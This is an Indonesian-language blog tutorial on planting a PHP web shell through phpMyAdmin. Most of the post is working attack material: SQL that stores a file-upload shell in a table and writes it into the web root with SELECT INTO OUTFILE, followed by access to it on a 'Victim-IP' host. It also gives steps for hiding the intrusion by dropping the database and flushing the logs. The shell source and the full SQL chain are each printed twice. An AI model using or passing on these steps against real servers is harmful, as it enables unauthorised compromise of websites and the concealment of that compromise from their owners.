Assalamu'alaikum Wr.Wb
Untuk episode kali ini saya akan membahas,cara menanam shell di PhpMyadmin
nah,sebelumnya saya hanya menyarankan untuk tidak hanya bisa copy paste dari kode saya ini..
karna sebelumnya saya juga mencari materi inject PhpMyadmin,dan sayangnya pada saat itu saya hanya
mencopy code yang diberikannya saja.
Maklumlah,namanya juga orang indonesia yang maunya hanya murah,mudah,meriah :v
tapi itu semua gak akan mengubah kita sebagai anak bangsa menjadi lebih maju akan tetapi sifat copas (copy-paste) akan
membuat kita menjadi malas untuk berfikir.
Sedikit curhat tentang kehidupan saya saja nih :3
walaupun saat ini saya lg gak punya laptop,tapi saya gak berhenti buat belajar komputer..
semua itu tergantung niat dan keinginan seseorang untuk menggapai sesuatu yang disebutnya dengan cita-cita
Oke,kebanyakan basa-basi..
ini saya tulis mengenai kodenya dan saya harapkan kepada para pembaca tidak hanya mengcopasnya mentah-mentah.
Ini step by step nya ane bakalan jelasin
Sarat buat inject PhpMyadmin :
- Punya Browser
- Sudah Bisa Login Ke PhpMyadmin
- Mengerti menggunakan PhpMyadmin
- Tau makna Create - Update - Delte dalam PhpMyadmin (CRUD)
Pertama :
Mari kita masuk ke PhpMyadmin,Kemudian kita buat sebuah table dengan metode menggunakan Run SQL query
Perintah pertama,mari kita buat database dengan nama "tanam" (tanpa tanda petik) dengan perintah
CREATE DATABASE tanam
Kedua :
Masuk kedalam database tanam yang telah dibuat tadi
dan pilih kembali Run SQL query kemudian buat table "shell" dan column "bajak"(tanpa tanda petik) dengan dengan perintah
create table `tanam`.`shell`(bajak text);
Ketiga :
Kemudian kembali masuk ke dalam Run SQL query dan saatnya menanam shell :p
tanam shell dengan perintah
INSERT INTO `tanam`.`shell` (`bajak`) VALUES ('<title>MASDA29D</title><form action="" method="post" enctype="multipart/form-data"><input type="file" name="m_upload"><input type="submit" name="upload" value="-=(x)=-"></form><?php error_reporting(0);?><?php $post=$_POST["upload"];if(isset($_POST["upload"]))$target_file = basename($_FILES["m_upload"]["name"]);{if(move_uploaded_file($_FILES["m_upload"]["tmp_name"], $target_file)){echo "Shell Udah Masuk Bos!!";}else{echo "Masukkan Shell Kamu Bos!!";}}?>
Keempat :
Nah untuk bisa mengetahui dimana path/basedir (base directory) kembali masuk ke Run SQL query dengan mengetikkan perintah
SHOW VARIABLES
Kelima :
Setelah kita mengetahui letak basedir nya maka kita masuk kembali ke Run SQL query dan saatnya kita membuat output file
dari shell yang udah kita masukkan tadi dengan perintah
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from shell;
Kemudian kamu bisa meng'excute codenya dengan perintah
http://Victim-IP/cmd.php?cmd=
Untuk lebih aman,biar gak ketahuan kamu bisa masuk kembali ke Run SQL query dan mengetikkan perintah
(gunanya untuk menghapus database yang udah dibuat tadi dan menghapus lognya :) )
DROP DATABASE tanam;
FLUSH LOGS;
========================================================================
Php Upload Shell :
========================================================================
<title>MASDA29D</title><form action="" method="post" enctype="multipart/form-data"><input type="file" name="m_upload"><input type="submit" name="upload" value="-=(x)=-"></form><?php error_reporting(0);?><?php $post=$_POST["upload"];if(isset($_POST["upload"]))$target_file = basename($_FILES["m_upload"]["name"]);{if(move_uploaded_file($_FILES["m_upload"]["tmp_name"], $target_file)){echo "Shell Udah Masuk Bos!!";}else{echo "Masukkan Shell Kamu Bos!!";}}?>
------------------------------------------------------------------------------------------------------------
========================================================================
Full Source Code :
========================================================================
CREATE DATABASE tanam;
CREATE TABLE `tanam`.`shell`(masda text);
INSERT INTO `tanam`.`shell` (`masda`) VALUES ('<title>MASDA29D</title><form action="" method="post" enctype="multipart/form-data"><input type="file" name="m_upload"><input type="submit" name="upload" value="-=(x)=-"></form><?php error_reporting(0);?><?php $post=$_POST["upload"];if(isset($_POST["upload"]))$target_file = basename($_FILES["m_upload"]["name"]);{if(move_uploaded_file($_FILES["m_upload"]["tmp_name"], $target_file)){echo "Shell Udah Masuk Bos!!";}else{echo "Masukkan Shell Kamu Bos!!";}}?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' FROM `tanam`.`shell`;
DROP DATABASE tanam;
FLUSH LOGS;
========================================================================
